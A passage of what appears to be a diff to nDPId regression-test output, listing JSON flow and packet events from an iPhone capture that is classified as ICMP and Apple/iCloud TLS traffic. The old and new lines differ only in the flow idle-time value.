00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454598885,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598885,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4434AAEABEeTAqAIRwKgCAQMDBHsAAAAARQAAz8hDAABAESx4wKgCAcCoAhEANfeRALsAAA=="} 
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4zMkAAEABKJnAqAIRwKgCAQMDKS0AAAAARQAAz3UJAABAEX+ywKgCAcCoAhEANdLfALsAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4CTAAAEAB7DLAqAIRwKgCAQMDOTMAAAAARQAA0GrYAABAEYniwKgCAcCoAhEANcLYALwAAA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"} 
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueserv
ice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalu
eservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a